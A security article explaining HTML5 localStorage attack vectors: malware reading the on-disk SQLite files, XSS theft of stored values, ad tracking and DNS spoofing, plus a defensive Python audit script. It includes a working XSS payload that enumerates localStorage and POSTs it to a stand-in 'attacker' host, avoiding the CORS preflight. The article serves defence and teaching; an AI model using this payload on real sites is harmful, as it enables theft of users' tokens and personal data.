HTML5 localstorage Attack Vectors & Security
By Shreeraj Shah (Blueinfy & iAppSecure)

Storage can expand the attack surface for application users. Storage brings both privacy and security
concerns for end clients within their browsers. It is imperative to have an appropriate defense and
proper protection in place to address this set of issues. The following attacks are possible.

Attack agent fetching sensitive information

LocalStorage is created on the physical hard drive, and this file can be accessed by any malware or virus that
has access to the underlying OS. For example, in the case of Chrome, a SQLite file is created in the
user directory as shown below.

Figure 1 – Dir listing of localStorage SQLite files in the user directory in Chrome

It is easy to open these files in any SQLite client application and see the information stored by the application on
the local system as shown below.

Figure 2 – Viewing localStorage files in SQL client application

Hence, sensitive data stored in localStorage is at significant risk from various standpoints, even though it
is of great value from a programming perspective.
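The on-disk exposure described above can be audited from the defender's side: the script below (an added example, not code from the paper) opens a Chrome-style localStorage SQLite file and flags items that look like credentials or account data. It assumes the legacy Chrome layout, one file per origin named like https_bank.example_0.localstorage with a table ItemTable(key TEXT, value BLOB) holding UTF-16LE strings, and constructs its own sample file so it runs offline.

```python
"""Audit what a web application has left in a Chrome-style localStorage
SQLite file on disk.

Added example, not part of the original paper.  Assumptions (labelled):
  * legacy Chrome on-disk format: one SQLite file per origin, named like
    'https_bank.example_0.localstorage', with a table
    ItemTable(key TEXT, value BLOB) whose values are UTF-16LE strings;
  * the sample file written by write_sample() is constructed here so the
    script runs offline; it is not real user data.
"""
import os
import re
import sqlite3
import tempfile

# Key names and value shapes a defender would not want to find persisted.
SENSITIVE_KEY_RE = re.compile(r"(token|session|passw|secret|auth|card|ssn)", re.I)
JWT_RE = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$")
CARD_RE = re.compile(r"^\d{13,19}$")


def decode_value(blob):
    """Chrome stores Storage values as UTF-16LE blobs (assumption, see header)."""
    if isinstance(blob, bytes):
        return blob.decode("utf-16-le", errors="replace")
    return str(blob)


def read_localstorage(path):
    """Return {key: value} for every item in one origin's SQLite file."""
    conn = sqlite3.connect(path)
    try:
        rows = conn.execute("SELECT key, value FROM ItemTable").fetchall()
    finally:
        conn.close()
    return {key: decode_value(value) for key, value in rows}


def classify(key, value):
    """Return the reasons an item looks sensitive (empty list if none)."""
    reasons = []
    if SENSITIVE_KEY_RE.search(key):
        reasons.append("key name suggests a credential or identifier")
    if JWT_RE.match(value):
        reasons.append("value looks like a JWT")
    if CARD_RE.match(value):
        reasons.append("value looks like a card or account number")
    return reasons


def audit(path):
    """Map each key with findings to its list of reasons."""
    findings = {}
    for key, value in read_localstorage(path).items():
        reasons = classify(key, value)
        if reasons:
            findings[key] = reasons
    return findings


def origin_from_filename(path):
    """'https_bank.example_0.localstorage' -> 'https://bank.example' (assumed naming)."""
    name = os.path.basename(path)
    m = re.match(r"^(https?)_(.+)_\d+\.localstorage$", name)
    return f"{m.group(1)}://{m.group(2)}" if m else name


def write_sample(directory):
    """Construct a sample file in the assumed layout (constructed data)."""
    path = os.path.join(directory, "https_bank.example_0.localstorage")
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE ItemTable (key TEXT UNIQUE ON CONFLICT REPLACE,"
                 " value BLOB NOT NULL ON CONFLICT FAIL)")
    items = {
        "theme": "dark",
        "session_token": "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI0MiJ9.c2ln",
        "last_txn": '[{"to":"ACME","amount":"120.00"}]',
        "card_number": "4111111111111111",
    }
    for k, v in items.items():
        conn.execute("INSERT INTO ItemTable VALUES (?, ?)", (k, v.encode("utf-16-le")))
    conn.commit()
    conn.close()
    return path


def audit_sample():
    """Build the constructed sample in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as d:
        return audit(write_sample(d))


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        sample = write_sample(d)
        print("origin:", origin_from_filename(sample))
        for key, reasons in audit(sample).items():
            print(f"  {key}: {'; '.join(reasons)}")
```

Running it against a real profile directory only requires pointing audit() at the origin's file; anything it flags is data that the first attack vector above can read without touching the browser at all.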

Attack through XSS

XSS can be a lethal attack vector for storage, since all storage is accessible from JavaScript. A cookie
marked as HttpOnly is not available to JavaScript, but with sessionStorage and
localStorage the game changes a bit. Hence, if an application is discovered to be vulnerable to XSS, an
attacker can execute a payload that fetches all session and local storage values and sends them back to his
own site. Sensitive information is compromised and the attacker gets access to the entire set of
interesting information. This XSS can be of any type – reflected, persistent or DOM-based.

For example, here is a simple payload.

var xmlhttp = false;
var ls = "";

// Walk every key in localStorage and collect "(key-value)" pairs into ls
if (localStorage.length) {
    console.log(localStorage.length);
    for (var i in localStorage) {
        ls += "(" + i + "-" + localStorage.getItem(i) + ")";
    }
}

function sendreq()
{
    xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", "http://attacker/msg/" + ls, true);

    // Using text/plain to bypass preflight call
    xmlhttp.setRequestHeader("Content-Type", "text/plain");
    xmlhttp.send(ls);
}

sendreq();


Let’s look at the first loop shown below.

if (localStorage.length) {
    console.log(localStorage.length);
    for (var i in localStorage) {
        ls += "(" + i + "-" + localStorage.getItem(i) + ")";
    }
}

In this loop all variables from localStorage are obtained using the getItem() call, and each value is fetched
along with its key. All of these get stored in the “ls” variable as shown below.





Figure 3 – Enumerating the contents of the variable “ls”

In the next call, the attacker sends this harvested value back to his own server, using an XHR call
with “text/plain” to bypass the pre-flight call as shown below.

function sendreq()
{
    xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", "http://attacker/msg/" + ls, true);

    // Using text/plain to bypass preflight call
    xmlhttp.setRequestHeader("Content-Type", "text/plain");
    xmlhttp.send(ls);
}

Finally, when the sendreq() call is made, the attacker gets the following response on the browser stack.




Figure 4 – browser stack response to the sendreq() call

Hence, the attacker is successful in enumerating values and sending them back to the server. It is
possible to apply the same routine to sessionStorage as well, using that object. This technique is a
completely blind enumeration: no prior knowledge of the application is required. If the application uses the
localStorage object, the loop below simply walks every key and fetches its value.

for (var i in localStorage) {
    ls += "(" + i + "-" + localStorage.getItem(i) + ")";
}


It is important to note that applications running with HTML5 use a single DOM, and when the attacker
finds DOM-based access it is child’s play for him to inject and exploit DOM-based calls. These calls
could come from a third-party server, or the content could come from untrusted sources.

Tracking user and invading privacy

LocalStorage is permanent and is bound to the browser. An attacker or an advertising company can
drop a localStorage identifier for a specific domain and then have full tracking available through APIs.
These API calls can be passed to their respective sites to track users across the world, since the identifier is tied to
a single browser. A company with access to multiple servers, such as an ad server, can start tracking a user from a
single domain and craft its advertising game plan. This invades the privacy of the user. Using
localStorage, a user could be mapped to his/her real identity, allowing persistent tracking via
JavaScript. Currently, the privacy area is somewhat ignored from the HTML5 point of view; in future this may be
a cause of concern for end users.

DNS spoofing attack vector

LocalStorage is accessible based on the origin or domain. Hence, if DNS is spoofed, the attacker gets
access to the browser session. In this case the localStorage created by the targeted application can
provide access to the sensitive data stored in the browser. This can lead to a potential security breach
and data theft. For example, if a bank stores an identifier, profile and the last 5 transactions in
localStorage, the attacker can get access to this sensitive set of information via DNS spoofing at the ISP
end. The application should defend its implementation by using TLS, which ensures that the
correct certificate is present before communicating and executing JavaScript in the browser session.



About Author

Shreeraj Shah
Founder & Director
Blueinfy and iAppSecure
www.blueinfy.com | www.iappsecure.com
Blog: http://shreeraj.blogspot.com
Twitter: @shreeraj
